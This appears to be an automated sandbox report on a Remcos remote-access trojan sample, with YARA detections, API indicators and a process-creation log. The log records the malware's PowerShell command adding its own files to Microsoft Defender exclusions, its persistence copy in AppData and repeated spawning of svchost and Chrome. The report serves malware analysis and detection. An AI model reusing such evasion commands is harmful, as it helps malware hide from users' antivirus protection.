                Source: 3.2.4XYAW8PbZH.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 3.2.4XYAW8PbZH.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0.2.4XYAW8PbZH.exe.39e2d20.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.4XYAW8PbZH.exe.39e2d20.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 3.2.4XYAW8PbZH.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 3.2.4XYAW8PbZH.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 3.2.4XYAW8PbZH.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000000.00000002.1832995156.0000000004425000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000000.00000002.1832995156.0000000003919000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: 4XYAW8PbZH.exe PID: 6976, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: 4XYAW8PbZH.exe PID: 2816, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 4XYAW8PbZH.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: graias.exe.3.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, aZ6hBXs8b9snu0Ud4p.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, aZ6hBXs8b9snu0Ud4p.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, JcP3CXbCj2MePxFw4t.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, JcP3CXbCj2MePxFw4t.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, JcP3CXbCj2MePxFw4t.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, JcP3CXbCj2MePxFw4t.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, JcP3CXbCj2MePxFw4t.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, JcP3CXbCj2MePxFw4t.csSecurity API names: _0020.AddAccessRule
                Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@461/91@25/7
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,3_2_00416AB7
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,3_2_0040E219
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_0041A64F FindResourceA,LoadResource,LockResource,SizeofResource,3_2_0041A64F
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00419BD4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,3_2_00419BD4
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\4XYAW8PbZH.exe.logJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7188
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-O844B9
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1208:120:WilError_03
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6976
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7312:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0f4gafwu.vs5.ps1Jump to behavior
                Source: 4XYAW8PbZH.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 4XYAW8PbZH.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: 4XYAW8PbZH.exeVirustotal: Detection: 59%
                Source: 4XYAW8PbZH.exeReversingLabs: Detection: 68%
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeFile read: C:\Users\user\Desktop\4XYAW8PbZH.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\4XYAW8PbZH.exe "C:\Users\user\Desktop\4XYAW8PbZH.exe"
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4XYAW8PbZH.exe"
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess created: C:\Users\user\Desktop\4XYAW8PbZH.exe "C:\Users\user\Desktop\4XYAW8PbZH.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6976 -s 1372
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess created: C:\Users\user\AppData\Roaming\Graias\graias.exe "C:\Users\user\AppData\Roaming\Graias\graias.exe"
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Graias\graias.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Users\user\AppData\Roaming\Graias\graias.exe "C:\Users\user\AppData\Roaming\Graias\graias.exe"
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7188 -s 1276
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2464 --field-trial-handle=2300,i,10737837625504977776,1997224637472770813,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2012,i,4138460331120134385,5683384739135737573,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2012 --field-trial-handle=1976,i,2517950207159565068,10782540892853908230,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1980,i,683593662308323729,9862283109921041436,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=828 --field-trial-handle=1136,i,5921432477754910368,13753575883471156045,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=2000,i,17133631053466548675,5917926669792758127,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1980,i,5631293592904426678,1728656617054090218,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1484 --field-trial-handle=1152,i,8013400789958701554,8044825980928044458,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1976,i,9020892517801786784,10645353824597710220,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1972,i,9724548607629697657,13638253049410839489,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2004 --field-trial-handle=1964,i,11798321828357005052,16972695017880113129,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1984 --field-trial-handle=1944,i,4936340759003262573,15814975481951039996,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1984,i,3689067430776497247,15300495909368681371,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1972,i,8812933395650124059,17698073702536386733,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1936,i,2605296248091638972,4924302696092150325,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1472 --field-trial-handle=1980,i,15377228353991002800,792711668187999877,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
